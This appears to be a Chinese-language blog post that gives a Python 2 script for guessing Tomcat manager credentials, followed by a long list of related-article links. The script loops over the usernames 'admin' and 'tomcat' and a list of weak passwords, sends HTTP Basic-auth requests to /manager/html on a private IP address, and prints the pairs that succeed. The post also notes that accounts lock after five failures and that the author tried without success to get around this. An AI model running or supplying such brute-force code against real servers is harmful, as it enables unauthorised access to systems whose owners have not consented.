Tomcat口令猜解工具【Python指令碼】

Tomcat 伺服器網頁部署，登入需使用者名稱/密碼，編寫了一個簡單的Python指令碼來測試一些簡單的弱口令。

測試環境：Tomcat版本 7.0

登入介面採用basic認證，Base 64加密一下，模擬瀏覽器進行發包

據測試，每個使用者名稱輸入5次錯誤的密碼會鎖定使用者，想了一些辦法，還是沒能繞過，這裡做個記錄，有時間再完善。

目前只能用於簡單的弱口令測試

Python指令碼如下：

import urllib
import urllib2
import time
import base64 

names=[`admin`,`tomcat`]
passwds=[``,`admin`,`tomcat`,`123456`,`root`]
for name in names: 
    name=name.rstrip()
    for passwd in passwds:  
        passwd=passwd.rstrip()
        user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"  
        Authorization = "Basic %s" % (base64.b64encode(name+`:`+passwd))
        header = { `User-Agent` : user_agent , `Authorization`:Authorization}  

        try:        
            url = "http://192.168.106.137:8080/manager/html"
            request = urllib2.Request(url,headers=header)
            response = urllib2.urlopen(request,timeout=5)
            result=response.read()


            if response.code ==200:
                print `[Success] `  + url+` `+name+`:`+passwd 
　　　　　　　　　 break
                
                
        except: 
            print `[false111] `  + url+` `+name+`:`+passwd 
            time.sleep(1)

Tomcat安裝指令碼
2017-05-09
Tomcat指令碼
Tomcat啟動指令碼
2016-08-11
Tomcat指令碼
Python tkinter 實現指令碼工具 GUI模版
2020-12-17
Python指令碼GUI
python 寫的http後臺弱口令爆破工具
2013-12-18
PythonHTTP
tomcat開機啟動指令碼
2017-04-24
Tomcat指令碼
tomcat定時啟動指令碼
2017-12-14
Tomcat指令碼
Tomcat的啟停指令碼原始碼解析
2020-07-04
Tomcat指令碼原始碼
知名 Hash 密碼猜測工具：Hashcat 開源
2015-12-05
密碼
分享一例指令碼發版和tomcat重啟指令碼
2016-10-25
指令碼Tomcat
tomcat弱口令後臺getshell漏洞復現
2024-04-08
Tomcat
Shell指令碼——Linux系統中的時間猜數字
2018-10-16
指令碼Linux
介面測試（apipost、jmeter和python指令碼）——測試工具
2022-06-24
APIJMeterPython指令碼
快速部署tomcat專案的Shell指令碼
2015-12-09
Tomcat指令碼
python 常用指令碼
2019-01-08
Python指令碼
分析 Python 指令碼
2015-08-31
Python指令碼
19、python 指令碼
2024-04-15
Python指令碼
FastScripts for Mac(指令碼呼叫工具)
2021-11-16
ASTMac指令碼
LeetCode題解(1178)：猜字謎(Python)
2020-11-26
LeetCodePython
Tomcat 7 啟動分析（一）啟動指令碼
2018-01-28
Tomcat指令碼
解剖Nginx·自動指令碼篇（4）工具型指令碼系列
2012-03-13
Nginx指令碼
Python爬蟲指令碼
2018-02-01
Python爬蟲指令碼
PYTHON測試指令碼
2018-03-14
Python指令碼
Python小指令碼1
2017-05-05
Python指令碼
分享：Charles 的指令碼工具盒
2022-11-27
指令碼
weblogic指令碼工具WLST(1)
2018-06-27
Web指令碼
shell指令碼文字處理工具
2024-04-25
指令碼
工具推薦. 線上unix, 線上python/perl指令碼測試環境
2015-05-12
Python指令碼
精讀 Nginx·自動指令碼篇（4）工具型指令碼系列
2012-03-13
Nginx指令碼
nmap指令碼詳解
2023-01-14
指令碼
定時重啟tomcat指令碼導致的亂碼問題
2014-12-22
Tomcat指令碼
怎麼停止python指令碼
2021-09-11
Python指令碼
Python指令碼秒換桌布
2020-12-27
Python指令碼
Python指令碼練習一
2013-10-31
Python指令碼
python效能測試指令碼
2013-04-18
Python指令碼
crontab排程Python指令碼
2013-03-22
Python指令碼
指令碼觸發工具——EventScripts Mac版
2020-04-22
指令碼Mac
指令碼快速啟動工具：FastScripts for mac
2022-09-28
指令碼ASTMac
主題 2 Shell工具和指令碼
2023-01-03
指令碼

Tomcat口令猜解工具【Python指令碼】

相關文章